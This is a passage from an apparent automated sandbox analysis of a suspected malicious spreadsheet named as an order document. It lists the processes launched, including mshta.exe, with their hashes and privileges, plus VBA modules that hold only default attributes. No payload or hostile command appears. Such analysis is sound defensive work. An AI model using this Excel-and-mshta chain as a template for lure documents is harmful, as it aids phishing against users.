          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:5
          Start time:09:02:04
          Start date:18/12/2024
          Path:C:\Windows\SysWOW64\mshta.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
          Imagebase:0x340000
          File size:13'312 bytes
          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:false

          Target ID:7
          Start time:09:02:07
          Start date:18/12/2024
          Path:C:\Windows\splwow64.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\splwow64.exe 12288
          Imagebase:0x7ff777cb0000
          File size:163'840 bytes
          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:10
          Start time:09:02:33
          Start date:18/12/2024
          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order_948575494759.xls"
          Imagebase:0xb70000
          File size:53'161'064 bytes
          MD5 hash:4A871771235598812032C822E6F68F19
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Call Graph

          • Entrypoint
          • Decryption Function
          • Executed
          • Not Executed
          • Show Help
          callgraph 1 Error: Graph is empty

          Module: Sheet1

          Declaration
          LineContent
          1

          Attribute VB_Name = "Sheet1"

          2

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = True

          9

          Attribute VB_Name = "Sheet1"

          10

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          11

          Attribute VB_GlobalNameSpace = False

          12

          Attribute VB_Creatable = False

          13

          Attribute VB_PredeclaredId = True

          14

          Attribute VB_Exposed = True

          15

          Attribute VB_TemplateDerived = False

          16

          Attribute VB_Customizable = True

          Module: Sheet2

          Declaration
          LineContent
          1

          Attribute VB_Name = "Sheet2"

          2

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = True

          9

          Attribute VB_Name = "Sheet2"

          10

          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

          11

          Attribute VB_GlobalNameSpace = False

          12

          Attribute VB_Creatable = False

          13

          Attribute VB_PredeclaredId = True

          14

          Attribute VB_Exposed = True

          15

          Attribute VB_TemplateDerived = False

          16

          Attribute VB_Customizable = True

          Module: ThisWorkbook

          Declaration
          LineContent
          1

          Attribute VB_Name = "ThisWorkbook"

          2

          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = True

          9

          Attribute VB_Name = "ThisWorkbook"

          10

          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

          11

          Attribute VB_GlobalNameSpace = False

          12

          Attribute VB_Creatable = False

          13

          Attribute VB_PredeclaredId = True

          14

          Attribute VB_Exposed = True

          15

          Attribute VB_TemplateDerived = False

          16

          Attribute VB_Customizable = True

          Reset < >